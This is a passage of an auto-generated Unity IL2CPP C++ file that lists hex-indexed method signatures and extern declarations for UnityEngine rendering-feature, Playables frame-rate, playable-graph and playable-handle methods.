// 0x00000873 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::IsLightmapsModeSupportedByRef(UnityEngine.LightmapsMode,System.IntPtr)
extern void SupportedRenderingFeatures_IsLightmapsModeSupportedByRef_m494FCDC548A34F66D7A71A81D0C38EFBF6459AEB (void);
// 0x00000874 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::IsLightmapperSupportedByRef(System.Int32,System.IntPtr)
extern void SupportedRenderingFeatures_IsLightmapperSupportedByRef_mFC8FCBE9FA4D3E210CBB8BA711FF0AE72648285A (void);
// 0x00000875 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::IsUIOverlayRenderedBySRP(System.IntPtr)
extern void SupportedRenderingFeatures_IsUIOverlayRenderedBySRP_m1AE190FFF1E73E64DC2F9CF21F44656056F2B2C9 (void);
// 0x00000876 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::IsAutoAmbientProbeBakingSupported(System.IntPtr)
extern void SupportedRenderingFeatures_IsAutoAmbientProbeBakingSupported_m2D00A73CB387BEDAFADF211A0E8579ACB544A6BC (void);
// 0x00000877 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::IsAutoDefaultReflectionProbeBakingSupported(System.IntPtr)
extern void SupportedRenderingFeatures_IsAutoDefaultReflectionProbeBakingSupported_m226DAFBB7099877D23B8273789A1FAC2130DDCC0 (void);
// 0x00000878 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::FallbackLightmapperByRef(System.IntPtr)
extern void SupportedRenderingFeatures_FallbackLightmapperByRef_mE8CE8E18176F1DF7FB7A315C3FF41029BFBDCA63 (void);
// 0x00000879 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::.ctor()
extern void SupportedRenderingFeatures__ctor_mF7728980F81142B7BD45FBB25AB001B17A4BF0ED (void);
// 0x0000087A System.Void UnityEngine.Rendering.SupportedRenderingFeatures::.cctor()
extern void SupportedRenderingFeatures__cctor_m95816EF1A9511038798E9D7FF161E929E0217DE0 (void);
// 0x0000087B System.Boolean UnityEngine.Playables.FrameData::HasFlags(UnityEngine.Playables.FrameData/Flags)
extern void FrameData_HasFlags_m268F3C0E03481E2F7217CEB6153C072AB0A68C1C (void);
// 0x0000087C System.Single UnityEngine.Playables.FrameData::get_deltaTime()
extern void FrameData_get_deltaTime_m522E00CB1B4DA759A5121778A7688DA07735C1F8 (void);
// 0x0000087D System.Single UnityEngine.Playables.FrameData::get_effectiveSpeed()
extern void FrameData_get_effectiveSpeed_m49D7C9FB90C9B640B64D701B026DC26540BC25B9 (void);
// 0x0000087E UnityEngine.Playables.FrameData/EvaluationType UnityEngine.Playables.FrameData::get_evaluationType()
extern void FrameData_get_evaluationType_m0212C6B9A3C3AD09BA24DD4291A9FB528BFD0842 (void);
// 0x0000087F System.Boolean UnityEngine.Playables.FrameData::get_seekOccurred()
extern void FrameData_get_seekOccurred_mC8325617A69EA31B70169D921E258AC60B2750D2 (void);
// 0x00000880 System.Boolean UnityEngine.Playables.FrameData::get_timeLooped()
extern void FrameData_get_timeLooped_m88F002C13ED791E65D9F5705AAD05C19C505918B (void);
// 0x00000881 System.Boolean UnityEngine.Playables.FrameData::get_timeHeld()
extern void FrameData_get_timeHeld_m1213876DD47660CEA565831282ACA4477BC6644F (void);
// 0x00000882 UnityEngine.Playables.PlayableOutput UnityEngine.Playables.FrameData::get_output()
extern void FrameData_get_output_mB5B10130E39676C78F53E6194390B01B87D54FBF (void);
// 0x00000883 UnityEngine.Playables.PlayState UnityEngine.Playables.FrameData::get_effectivePlayState()
extern void FrameData_get_effectivePlayState_m58201D8BB3B3489399055AC4D1264007552F2BAB (void);
// 0x00000884 System.Boolean UnityEngine.Playables.FrameRate::get_dropFrame()
extern void FrameRate_get_dropFrame_mC8BFEB9E9E33328497040C4D02EAF1F0DC84AFF4 (void);
// 0x00000885 System.Double UnityEngine.Playables.FrameRate::get_rate()
extern void FrameRate_get_rate_mF21BC02932E30CCC1832FE1B3C08FE6679F95406 (void);
// 0x00000886 System.Void UnityEngine.Playables.FrameRate::.ctor(System.UInt32,System.Boolean)
extern void FrameRate__ctor_m9DF0B1521A85AE2CD542C19C1C253301B389CA71 (void);
// 0x00000887 System.Boolean UnityEngine.Playables.FrameRate::IsValid()
extern void FrameRate_IsValid_m8F983C71BC91E1AEF857517C4D344D9FCEAE2851 (void);
// 0x00000888 System.Boolean UnityEngine.Playables.FrameRate::Equals(UnityEngine.Playables.FrameRate)
extern void FrameRate_Equals_m71B1BAAEDC9E1096965764135FF45A1C464639E6 (void);
// 0x00000889 System.Boolean UnityEngine.Playables.FrameRate::Equals(System.Object)
extern void FrameRate_Equals_m318AFC57E72479688AFA71ECFCB8F2113BC0044C (void);
// 0x0000088A System.Boolean UnityEngine.Playables.FrameRate::op_Equality(UnityEngine.Playables.FrameRate,UnityEngine.Playables.FrameRate)
extern void FrameRate_op_Equality_m20786BB4FF6E0B7F40F935A945AF8CA63D77FEC4 (void);
// 0x0000088B System.Int32 UnityEngine.Playables.FrameRate::GetHashCode()
extern void FrameRate_GetHashCode_mD760D080786680B77E3E8F059950F48EAAF6A819 (void);
// 0x0000088C System.String UnityEngine.Playables.FrameRate::ToString()
extern void FrameRate_ToString_m899E2A85E7CE55B74522F23706508BD4AF18934F (void);
// 0x0000088D System.String UnityEngine.Playables.FrameRate::ToString(System.String,System.IFormatProvider)
extern void FrameRate_ToString_m72358F5840A02CA9E1B5F326575596E2B094BB56 (void);
// 0x0000088E UnityEngine.Playables.FrameRate UnityEngine.Playables.FrameRate::DoubleToFrameRate(System.Double)
extern void FrameRate_DoubleToFrameRate_mBF7B8DC218B347F607E379E7BD9C44DFA69C4B61 (void);
// 0x0000088F System.Void UnityEngine.Playables.FrameRate::.cctor()
extern void FrameRate__cctor_mCF386A3D08C0E45EFFE95416C146DB4685D0E381 (void);
// 0x00000890 UnityEngine.PropertyName UnityEngine.Playables.INotification::get_id()
// 0x00000891 System.Void UnityEngine.Playables.INotificationReceiver::OnNotify(UnityEngine.Playables.Playable,UnityEngine.Playables.INotification,System.Object)
// 0x00000892 UnityEngine.Playables.PlayableHandle UnityEngine.Playables.IPlayable::GetHandle()
// 0x00000893 System.Void UnityEngine.Playables.IPlayableBehaviour::OnGraphStart(UnityEngine.Playables.Playable)
// 0x00000894 System.Void UnityEngine.Playables.IPlayableBehaviour::OnGraphStop(UnityEngine.Playables.Playable)
// 0x00000895 System.Void UnityEngine.Playables.IPlayableBehaviour::OnPlayableCreate(UnityEngine.Playables.Playable)
// 0x00000896 System.Void UnityEngine.Playables.IPlayableBehaviour::OnPlayableDestroy(UnityEngine.Playables.Playable)
// 0x00000897 System.Void UnityEngine.Playables.IPlayableBehaviour::OnBehaviourPlay(UnityEngine.Playables.Playable,UnityEngine.Playables.FrameData)
// 0x00000898 System.Void UnityEngine.Playables.IPlayableBehaviour::OnBehaviourPause(UnityEngine.Playables.Playable,UnityEngine.Playables.FrameData)
// 0x00000899 System.Void UnityEngine.Playables.IPlayableBehaviour::PrepareFrame(UnityEngine.Playables.Playable,UnityEngine.Playables.FrameData)
// 0x0000089A System.Void UnityEngine.Playables.IPlayableBehaviour::ProcessFrame(UnityEngine.Playables.Playable,UnityEngine.Playables.FrameData,System.Object)
// 0x0000089B UnityEngine.Playables.PlayableOutputHandle UnityEngine.Playables.IPlayableOutput::GetHandle()
// 0x0000089C UnityEngine.Playables.Playable UnityEngine.Playables.Playable::get_Null()
extern void Playable_get_Null_m13BA20519948F798D105B0F5F4FCF0D738CEA5A7 (void);
// 0x0000089D UnityEngine.Playables.Playable UnityEngine.Playables.Playable::Create(UnityEngine.Playables.PlayableGraph,System.Int32)
extern void Playable_Create_m599EF0161E10B4244461F3335A6294AEBBA02123 (void);
// 0x0000089E System.Void UnityEngine.Playables.Playable::.ctor(UnityEngine.Playables.PlayableHandle)
extern void Playable__ctor_mD2EB35E024816AEED68795D0124EAB30E05BF6C4 (void);
// 0x0000089F UnityEngine.Playables.PlayableHandle UnityEngine.Playables.Playable::GetHandle()
extern void Playable_GetHandle_m39356D23E849DC5428B262092657662C064E04F8 (void);
// 0x000008A0 System.Boolean UnityEngine.Playables.Playable::IsPlayableOfType()
// 0x000008A1 System.Type UnityEngine.Playables.Playable::GetPlayableType()
extern void Playable_GetPlayableType_mF7103BE376DCD61F54669681AE7BB7D6963D6D43 (void);
// 0x000008A2 System.Boolean UnityEngine.Playables.Playable::Equals(UnityEngine.Playables.Playable)
extern void Playable_Equals_mD72D3DB892B8867A0E7BAC032A16C08616EEFF86 (void);
// 0x000008A3 System.Void UnityEngine.Playables.Playable::.cctor()
extern void Playable__cctor_m75FC3E0FF1F2C5AD39A0AE7F2967AC5D0ABAEF0A (void);
// 0x000008A4 UnityEngine.Playables.Playable UnityEngine.Playables.IPlayableAsset::CreatePlayable(UnityEngine.Playables.PlayableGraph,UnityEngine.GameObject)
// 0x000008A5 System.Double UnityEngine.Playables.IPlayableAsset::get_duration()
// 0x000008A6 UnityEngine.Playables.Playable UnityEngine.Playables.PlayableAsset::CreatePlayable(UnityEngine.Playables.PlayableGraph,UnityEngine.GameObject)
// 0x000008A7 System.Double UnityEngine.Playables.PlayableAsset::get_duration()
extern void PlayableAsset_get_duration_m4668A767DDB780565E6506E63B4797B820405CFE (void);
// 0x000008A8 System.Collections.Generic.IEnumerable`1<UnityEngine.Playables.PlayableBinding> UnityEngine.Playables.PlayableAsset::get_outputs()
extern void PlayableAsset_get_outputs_m5760B1B5EE08B0327FA7D90AE92C94227B1C993C (void);
// 0x000008A9 System.Void UnityEngine.Playables.PlayableAsset::Internal_CreatePlayable(UnityEngine.Playables.PlayableAsset,UnityEngine.Playables.PlayableGraph,UnityEngine.GameObject,System.IntPtr)
extern void PlayableAsset_Internal_CreatePlayable_mC2DE0964868E459854F8B7564830BDF47424CD65 (void);
// 0x000008AA System.Void UnityEngine.Playables.PlayableAsset::Internal_GetPlayableAssetDuration(UnityEngine.Playables.PlayableAsset,System.IntPtr)
extern void PlayableAsset_Internal_GetPlayableAssetDuration_m88EC64D33EDDDCF5DD24FF233BEC2013DFDDF622 (void);
// 0x000008AB System.Void UnityEngine.Playables.PlayableAsset::.ctor()
extern void PlayableAsset__ctor_m36B842356F02DF323B356BAAF6E3DC59BA9E1AB8 (void);
// 0x000008AC System.Void UnityEngine.Playables.PlayableBehaviour::.ctor()
extern void PlayableBehaviour__ctor_mA6202DCD846F0DDFC5963764A404EE8AFABEA23A (void);
// 0x000008AD System.Void UnityEngine.Playables.PlayableBehaviour::OnGraphStart(UnityEngine.Playables.Playable)
extern void PlayableBehaviour_OnGraphStart_mB5944807796239EFB530022539674C4E4D185D65 (void);
// 0x000008AE System.Void UnityEngine.Playables.PlayableBehaviour::OnGraphStop(UnityEngine.Playables.Playable)
extern void PlayableBehaviour_OnGraphStop_mF80DFC8A3C2D2CA9299011D9E871ED6A8A9586CA (void);
// 0x000008AF System.Void UnityEngine.Playables.PlayableBehaviour::OnPlayableCreate(UnityEngine.Playables.Playable)
extern void PlayableBehaviour_OnPlayableCreate_m22B0F0051A677A523C5702AABC6B1C9D358E90B8 (void);
// 0x000008B0 System.Void UnityEngine.Playables.PlayableBehaviour::OnPlayableDestroy(UnityEngine.Playables.Playable)
extern void PlayableBehaviour_OnPlayableDestroy_m3DB0AF7BD9689DA1BCCBBFD19BDD544143027C3C (void);
// 0x000008B1 System.Void UnityEngine.Playables.PlayableBehaviour::OnBehaviourPlay(UnityEngine.Playables.Playable,UnityEngine.Playables.FrameData)
extern void PlayableBehaviour_OnBehaviourPlay_m05F6FCCBC6E8FB4BA0BE2690045AF28BF95C6FE2 (void);
// 0x000008B2 System.Void UnityEngine.Playables.PlayableBehaviour::OnBehaviourPause(UnityEngine.Playables.Playable,UnityEngine.Playables.FrameData)
extern void PlayableBehaviour_OnBehaviourPause_m431A7BD2EE99C1862563FEA37E20C365B753930B (void);
// 0x000008B3 System.Void UnityEngine.Playables.PlayableBehaviour::PrepareFrame(UnityEngine.Playables.Playable,UnityEngine.Playables.FrameData)
extern void PlayableBehaviour_PrepareFrame_m33FED1E870D350D8276712A2CD75118FEFAA86BD (void);
// 0x000008B4 System.Void UnityEngine.Playables.PlayableBehaviour::ProcessFrame(UnityEngine.Playables.Playable,UnityEngine.Playables.FrameData,System.Object)
extern void PlayableBehaviour_ProcessFrame_mB80DDB2AB5D7EC0D3B9A466D37BE8556F6BBD2A0 (void);
// 0x000008B5 System.Object UnityEngine.Playables.PlayableBehaviour::Clone()
extern void PlayableBehaviour_Clone_m6A5B052F4ECA2ADED5937A4843777F52CCD33EE8 (void);
// 0x000008B6 UnityEngine.Object UnityEngine.Playables.PlayableBinding::get_sourceObject()
extern void PlayableBinding_get_sourceObject_m195E6C4C3DF88BD89A2DE3923646B9A013310C09 (void);
// 0x000008B7 UnityEngine.Playables.PlayableOutput UnityEngine.Playables.PlayableBinding::CreateOutput(UnityEngine.Playables.PlayableGraph)
extern void PlayableBinding_CreateOutput_mE29B8B4AE0857C038D6DCA6824A307C60E2DD7C6 (void);
// 0x000008B8 UnityEngine.Playables.PlayableBinding UnityEngine.Playables.PlayableBinding::CreateInternal(System.String,UnityEngine.Object,System.Type,UnityEngine.Playables.PlayableBinding/CreateOutputMethod)
extern void PlayableBinding_CreateInternal_m4CAAB6FB532F76FEA5BDD52D855F36BDA35517B3 (void);
// 0x000008B9 System.Void UnityEngine.Playables.PlayableBinding::.cctor()
extern void PlayableBinding__cctor_m60F178A142DCD473565A15003603A696FE3EBC02 (void);
// 0x000008BA System.Void UnityEngine.Playables.PlayableBinding/CreateOutputMethod::.ctor(System.Object,System.IntPtr)
extern void CreateOutputMethod__ctor_m5A339017CD8ECB0140EB936FD2A5B589B20166B4 (void);
// 0x000008BB UnityEngine.Playables.PlayableOutput UnityEngine.Playables.PlayableBinding/CreateOutputMethod::Invoke(UnityEngine.Playables.PlayableGraph,System.String)
extern void CreateOutputMethod_Invoke_mEC7DC5D9A9325BFFB17C248AE9738637704B89CC (void);
// 0x000008BC System.Boolean UnityEngine.Playables.PlayableExtensions::IsValid(U)
// 0x000008BD UnityEngine.Playables.PlayableGraph UnityEngine.Playables.PlayableExtensions::GetGraph(U)
// 0x000008BE UnityEngine.Playables.PlayState UnityEngine.Playables.PlayableExtensions::GetPlayState(U)
// 0x000008BF System.Void UnityEngine.Playables.PlayableExtensions::Play(U)
// 0x000008C0 System.Void UnityEngine.Playables.PlayableExtensions::Pause(U)
// 0x000008C1 System.Void UnityEngine.Playables.PlayableExtensions::SetSpeed(U,System.Double)
// 0x000008C2 System.Void UnityEngine.Playables.PlayableExtensions::SetDuration(U,System.Double)
// 0x000008C3 System.Double UnityEngine.Playables.PlayableExtensions::GetDuration(U)
// 0x000008C4 System.Void UnityEngine.Playables.PlayableExtensions::SetTime(U,System.Double)
// 0x000008C5 System.Double UnityEngine.Playables.PlayableExtensions::GetTime(U)
// 0x000008C6 System.Double UnityEngine.Playables.PlayableExtensions::GetPreviousTime(U)
// 0x000008C7 System.Boolean UnityEngine.Playables.PlayableExtensions::IsDone(U)
// 0x000008C8 System.Void UnityEngine.Playables.PlayableExtensions::SetPropagateSetTime(U,System.Boolean)
// 0x000008C9 System.Void UnityEngine.Playables.PlayableExtensions::SetInputCount(U,System.Int32)
// 0x000008CA System.Int32 UnityEngine.Playables.PlayableExtensions::GetInputCount(U)
// 0x000008CB UnityEngine.Playables.Playable UnityEngine.Playables.PlayableExtensions::GetInput(U,System.Int32)
// 0x000008CC System.Void UnityEngine.Playables.PlayableExtensions::SetInputWeight(U,System.Int32,System.Single)
// 0x000008CD System.Void UnityEngine.Playables.PlayableExtensions::SetInputWeight(U,V,System.Single)
// 0x000008CE System.Single UnityEngine.Playables.PlayableExtensions::GetInputWeight(U,System.Int32)
// 0x000008CF System.Void UnityEngine.Playables.PlayableExtensions::SetTraversalMode(U,UnityEngine.Playables.PlayableTraversalMode)
// 0x000008D0 UnityEngine.Playables.DirectorWrapMode UnityEngine.Playables.PlayableExtensions::GetTimeWrapMode(U)
// 0x000008D1 System.Void UnityEngine.Playables.PlayableExtensions::SetTimeWrapMode(U,UnityEngine.Playables.DirectorWrapMode)
// 0x000008D2 UnityEngine.Playables.Playable UnityEngine.Playables.PlayableGraph::GetRootPlayable(System.Int32)
extern void PlayableGraph_GetRootPlayable_m3BA0011AD6B13FCE5D58EA3E9BB17BE84319B53C (void);
// 0x000008D3 System.Boolean UnityEngine.Playables.PlayableGraph::Connect(U,System.Int32,V,System.Int32)
// 0x000008D4 System.Void UnityEngine.Playables.PlayableGraph::Evaluate()
extern void PlayableGraph_Evaluate_m5E8756A5AB34EB7F9FC7682932D4BD6BE418352A (void);
// 0x000008D5 System.Boolean UnityEngine.Playables.PlayableGraph::IsValid()
extern void PlayableGraph_IsValid_mB608FD2CEDAA27C31C34DF4639CF98199ECDC3CA (void);
// 0x000008D6 System.Boolean UnityEngine.Playables.PlayableGraph::IsPlaying()
extern void PlayableGraph_IsPlaying_m9289A7D3CBD3A73051568C20F384C1D4FBBA89E0 (void);
// 0x000008D7 System.Void UnityEngine.Playables.PlayableGraph::Evaluate(System.Single)
extern void PlayableGraph_Evaluate_m56DAAF530D0A6079FCBCFE86EF5E3E33374A22A7 (void);
// 0x000008D8 UnityEngine.IExposedPropertyTable UnityEngine.Playables.PlayableGraph::GetResolver()
extern void PlayableGraph_GetResolver_m7869599485E96C9D09E0680FA25099E9B2789A47 (void);
// 0x000008D9 System.Int32 UnityEngine.Playables.PlayableGraph::GetPlayableCount()
extern void PlayableGraph_GetPlayableCount_m69E1448E840367C9A1D05BE0FB1908BD0C04B809 (void);
// 0x000008DA System.Int32 UnityEngine.Playables.PlayableGraph::GetRootPlayableCount()
extern void PlayableGraph_GetRootPlayableCount_mAD4CB33AEDB21181CAE1312C3D23CA14E52FFA45 (void);
// 0x000008DB System.Void UnityEngine.Playables.PlayableGraph::SynchronizeEvaluation(UnityEngine.Playables.PlayableGraph)
extern void PlayableGraph_SynchronizeEvaluation_m9911E65EE4FE46BAE375EF11C884136C840760C0 (void);
// 0x000008DC UnityEngine.Playables.PlayableHandle UnityEngine.Playables.PlayableGraph::CreatePlayableHandle()
extern void PlayableGraph_CreatePlayableHandle_mF90D606A614FB603DBFFE4E87C325F8CC59BED67 (void);
// 0x000008DD System.Boolean UnityEngine.Playables.PlayableGraph::CreateScriptOutputInternal(System.String,UnityEngine.Playables.PlayableOutputHandle&)
extern void PlayableGraph_CreateScriptOutputInternal_m7B8A726419E5A7E5C07436BC168CE28B2D970393 (void);
// 0x000008DE UnityEngine.Playables.PlayableHandle UnityEngine.Playables.PlayableGraph::GetRootPlayableInternal(System.Int32)
extern void PlayableGraph_GetRootPlayableInternal_mB01EE3DE1FED4EB160B5EA367448521ED0F36165 (void);
// 0x000008DF System.Boolean UnityEngine.Playables.PlayableGraph::IsMatchFrameRateEnabled()
extern void PlayableGraph_IsMatchFrameRateEnabled_mC6D005B2F581E49DEA0037C8811CEA771C3CE1C3 (void);
// 0x000008E0 UnityEngine.Playables.FrameRate UnityEngine.Playables.PlayableGraph::GetFrameRate()
extern void PlayableGraph_GetFrameRate_m81DF8FC361E09CC2A2FE2350E48FF2B1E4AFA990 (void);
// 0x000008E1 System.Boolean UnityEngine.Playables.PlayableGraph::ConnectInternal(UnityEngine.Playables.PlayableHandle,System.Int32,UnityEngine.Playables.PlayableHandle,System.Int32)
extern void PlayableGraph_ConnectInternal_m86DBDCCD0D8D5B1734EA7E90268F057A6E52525A (void);
// 0x000008E2 System.Boolean UnityEngine.Playables.PlayableGraph::IsValid_Injected(UnityEngine.Playables.PlayableGraph&)
extern void PlayableGraph_IsValid_Injected_m38C19708A13E45B47938245C10230A5AE3EA3A7C (void);
// 0x000008E3 System.Boolean UnityEngine.Playables.PlayableGraph::IsPlaying_Injected(UnityEngine.Playables.PlayableGraph&)
extern void PlayableGraph_IsPlaying_Injected_m6853B8C3823B45DFC32C9F23D12D768945D27417 (void);
// 0x000008E4 System.Void UnityEngine.Playables.PlayableGraph::Evaluate_Injected(UnityEngine.Playables.PlayableGraph&,System.Single)
extern void PlayableGraph_Evaluate_Injected_m25190F19B7C05D0E3F06C4D61C15C20C76A692D9 (void);
// 0x000008E5 UnityEngine.IExposedPropertyTable UnityEngine.Playables.PlayableGraph::GetResolver_Injected(UnityEngine.Playables.PlayableGraph&)
extern void PlayableGraph_GetResolver_Injected_m46650234C8949E260D7E2F3A67C9EC184A6809F5 (void);
// 0x000008E6 System.Int32 UnityEngine.Playables.PlayableGraph::GetPlayableCount_Injected(UnityEngine.Playables.PlayableGraph&)
extern void PlayableGraph_GetPlayableCount_Injected_m1F7B7B6400DAEEF218EB40D31FAF4E77ECB58AD3 (void);
// 0x000008E7 System.Int32 UnityEngine.Playables.PlayableGraph::GetRootPlayableCount_Injected(UnityEngine.Playables.PlayableGraph&)
extern void PlayableGraph_GetRootPlayableCount_Injected_m361930597784E2C478CADDBCBCFE32BA998E2F8C (void);
// 0x000008E8 System.Void UnityEngine.Playables.PlayableGraph::SynchronizeEvaluation_Injected(UnityEngine.Playables.PlayableGraph&,UnityEngine.Playables.PlayableGraph&)
extern void PlayableGraph_SynchronizeEvaluation_Injected_m150E4F7D7993DBD85CF30D143D964DA68A8097E5 (void);
// 0x000008E9 System.Void UnityEngine.Playables.PlayableGraph::CreatePlayableHandle_Injected(UnityEngine.Playables.PlayableGraph&,UnityEngine.Playables.PlayableHandle&)
extern void PlayableGraph_CreatePlayableHandle_Injected_m6DAE7F87EF01E3C6429FEC6AAEA0A264128B3E61 (void);
// 0x000008EA System.Boolean UnityEngine.Playables.PlayableGraph::CreateScriptOutputInternal_Injected(UnityEngine.Playables.PlayableGraph&,System.String,UnityEngine.Playables.PlayableOutputHandle&)
extern void PlayableGraph_CreateScriptOutputInternal_Injected_m65A2EECE96C095AEC9CF11474AFF72EBC30472AA (void);
// 0x000008EB System.Void UnityEngine.Playables.PlayableGraph::GetRootPlayableInternal_Injected(UnityEngine.Playables.PlayableGraph&,System.Int32,UnityEngine.Playables.PlayableHandle&)
extern void PlayableGraph_GetRootPlayableInternal_Injected_m80A0E83F214A01F5BE69D63AD56A162B9E74CC32 (void);
// 0x000008EC System.Boolean UnityEngine.Playables.PlayableGraph::IsMatchFrameRateEnabled_Injected(UnityEngine.Playables.PlayableGraph&)
extern void PlayableGraph_IsMatchFrameRateEnabled_Injected_m61515BE12764FA8F8DB31DFAE164594E8C700CC6 (void);
// 0x000008ED System.Void UnityEngine.Playables.PlayableGraph::GetFrameRate_Injected(UnityEngine.Playables.PlayableGraph&,UnityEngine.Playables.FrameRate&)
extern void PlayableGraph_GetFrameRate_Injected_m0EBBE79E8D3E7A0EE83625E8667C8E03FDC0E342 (void);
// 0x000008EE System.Boolean UnityEngine.Playables.PlayableGraph::ConnectInternal_Injected(UnityEngine.Playables.PlayableGraph&,UnityEngine.Playables.PlayableHandle&,System.Int32,UnityEngine.Playables.PlayableHandle&,System.Int32)
extern void PlayableGraph_ConnectInternal_Injected_mDBBC929E39B82AC79315C637E859D814BE642F07 (void);
// 0x000008EF T UnityEngine.Playables.PlayableHandle::GetObject()
// 0x000008F0 System.Boolean UnityEngine.Playables.PlayableHandle::IsPlayableOfType()
// 0x000008F1 UnityEngine.Playables.PlayableHandle UnityEngine.Playables.PlayableHandle::get_Null()
extern void PlayableHandle_get_Null_m32D9E05C019AC0153C26392C7946F0A1654D1217 (void);
// 0x000008F2 UnityEngine.Playables.Playable UnityEngine.Playables.PlayableHandle::GetInput(System.Int32)
extern void PlayableHandle_GetInput_m3F42E2CF0D7DFA2396295133D02622C1BE3A8633 (void);
// 0x000008F3 System.Boolean UnityEngine.Playables.PlayableHandle::SetInputWeight(System.Int32,System.Single)
extern void PlayableHandle_SetInputWeight_m8647C2593A24870E429A0832FC26EE2241CC302E (void);
// 0x000008F4 System.Single UnityEngine.Playables.PlayableHandle::GetInputWeight(System.Int32)
extern void PlayableHandle_GetInputWeight_m0C5D7A870D6DDE9F1A5193907ADCA0335DC6207A (void);
// 0x000008F5 System.Boolean UnityEngine.Playables.PlayableHandle::op_Equality(UnityEngine.Playables.PlayableHandle,UnityEngine.Playables.PlayableHandle)
extern void PlayableHandle_op_Equality_m5E9B847A9D36875C78902727FE36FBEDA4D2D3B9 (void);
// 0x000008F6 System.Boolean UnityEngine.Playables.PlayableHandle::Equals(System.Object)
extern void PlayableHandle_Equals_m60AD76B7D38CA989AE84501B2E9F9ED5CB5F9670 (void);
// 0x000008F7 System.Boolean UnityEngine.Playables.PlayableHandle::Equals(UnityEngine.Playables.PlayableHandle)
extern void PlayableHandle_Equals_m81BA0E127133DFF3E45DA61D185FDF48E16BCF45 (void);
// 0x000008F8 System.Int32 UnityEngine.Playables.PlayableHandle::GetHashCode()
extern void PlayableHandle_GetHashCode_m10FB32ECDC0B9D7BDAEA9E3B76BDDF4614F4EF4F (void);
// 0x000008F9 System.Boolean UnityEngine.Playables.PlayableHandle::CompareVersion(UnityEngine.Playables.PlayableHandle,UnityEngine.Playables.PlayableHandle)
extern void PlayableHandle_CompareVersion_m802DDE7AF60A7492B1BCF3FDBE00198605001CD8 (void);
// 0x000008FA System.Boolean UnityEngine.Playables.PlayableHandle::CheckInputBounds(System.Int32)
extern void PlayableHandle_CheckInputBounds_m5A5D02E53EF84B63F75DBB414906923677EED1E3 (void);
// 0x000008FB System.Boolean UnityEngine.Playables.PlayableHandle::CheckInputBounds(System.Int32,System.Boolean)
extern void PlayableHandle_CheckInputBounds_mEA09337758C333586D6B7B4A5D1E10852ECFC1D8 (void);
// 0x000008FC System.Boolean UnityEngine.Playables.PlayableHandle::IsValid()
extern void PlayableHandle_IsValid_m07631D12846BAAF2CC302E69A28A44BFE9EB5098 (void);
// 0x000008FD System.Type UnityEngine.Playables.PlayableHandle::GetPlayableType()
extern void PlayableHandle_GetPlayableType_mD9750F1B85DF086F52641D6AB85789601486B686 (void);
// 0x000008FE System.Void UnityEngine.Playables.PlayableHandle::SetScriptInstance(System.Object)
extern void PlayableHandle_SetScriptInstance_m479F7C03A25E77284BE1949CF5EABE903B9B26EE (void);
// 0x000008FF UnityEngine.Playables.PlayState UnityEngine.Playables.PlayableHandle::GetPlayState()
extern void PlayableHandle_GetPlayState_m14547B804BB9B9B9E2B20B3F0975334CC99E778F (void);
// 0x00000900 System.Void UnityEngine.Playables.PlayableHandle::Play()
extern void PlayableHandle_Play_m1EF8E1105EB6A4A9B0D6638A57CDCBCEEDC6FB2D (void);
// 0x00000901 System.Void UnityEngine.Playables.PlayableHandle::Pause()
extern void PlayableHandle_Pause_m75833A31BA17AC8900736C6F5AC778D033001B32 (void);
// 0x00000902 System.Void UnityEngine.Playables.PlayableHandle::SetSpeed(System.Double)
extern void PlayableHandle_SetSpeed_m39D426AE0DF93F876C2C1EDF9417C11B97A305E9 (void);
// 0x00000903 System.Double UnityEngine.Playables.PlayableHandle::GetTime()
extern void PlayableHandle_GetTime_m27CB24B86EF0E6A4BD2C53907A677059B5D2BD5D (void);
// 0x00000904 System.Void UnityEngine.Playables.PlayableHandle::SetTime(System.Double)
extern void PlayableHandle_SetTime_m6D255AB6779F3DC278813F1C016FE4EBC9F4B1E4 (void);
// 0x00000905 System.Boolean UnityEngine.Playables.PlayableHandle::IsDone()
extern void PlayableHandle_IsDone_mF5DAB54F941BC13799577396526E3901CF639DE6 (void);
// 0x00000906 System.Double UnityEngine.Playables.PlayableHandle::GetDuration()
extern void PlayableHandle_GetDuration_mE3CF9C12CA5A186288A7F1981A92F043100E02A7 (void);
// 0x00000907 System.Void UnityEngine.Playables.PlayableHandle::SetDuration(System.Double)
extern void PlayableHandle_SetDuration_m4E07F9F3A90B2F3CE10325D9F405993F03CCA08B (void);
// 0x00000908 System.Void UnityEngine.Playables.PlayableHandle::SetPropagateSetTime(System.Boolean)
extern void PlayableHandle_SetPropagateSetTime_mD1458DFF49EF07D73884A9BBAC31358579C8931B (void);
// 0x00000909 UnityEngine.Playables.PlayableGraph UnityEngine.Playables.PlayableHandle::GetGraph()
extern void PlayableHandle_GetGraph_m03AFC9F0B66AC13A120EC37F6964200C9973CE24 (void);
// 0x0000090A System.Int32 UnityEngine.Playables.PlayableHandle::GetInputCount()
extern void PlayableHandle_GetInputCount_m7FE60883E4B7C9AF7D39F28A044924ADBD5E5121 (void);
// 0x0000090B System.Void UnityEngine.Playables.PlayableHandle::SetInputCount(System.Int32)
extern void PlayableHandle_SetInputCount_m6067CD3616C428F777903FCBFD789060A2185DEE (void);
// 0x0000090C System.Void UnityEngine.Playables.PlayableHandle::SetInputWeight(UnityEngine.Playables.PlayableHandle,System.Single)
extern void PlayableHandle_SetInputWeight_mCC570E6D826D79987CC4E021DA9E7C0B700C0AC1 (void);
// 0x0000090D System.Double UnityEngine.Playables.PlayableHandle::GetPreviousTime()
extern void PlayableHandle_GetPreviousTime_m0C6881E900DF5FE7281699876DFE48BA64DEC1BF (void);
// 0x0000090E System.Void UnityEngine.Playables.PlayableHandle::SetTraversalMode(UnityEngine.Playables.PlayableTraversalMode)
extern void PlayableHandle_SetTraversalMode_m5302D6FC1935F2EF97E25DF58B402CC8700DE03D (void);
// 0x0000090F UnityEngine.Playables.DirectorWrapMode UnityEngine.Playables.PlayableHandle::GetTimeWrapMode()
extern void PlayableHandle_GetTimeWrapMode_m3C4CF421B7470E04537C45092DA9A1D242A5D1B4 (void);
// 0x00000910 System.Void UnityEngine.Playables.PlayableHandle::SetTimeWrapMode(UnityEngine.Playables.DirectorWrapMode)
extern void PlayableHandle_SetTimeWrapMode_m88B50CE0AABE0183BBF12ACEC5E84CBEDAB76C2F (void);
// 0x00000911 System.Object UnityEngine.Playables.PlayableHandle::GetScriptInstance()
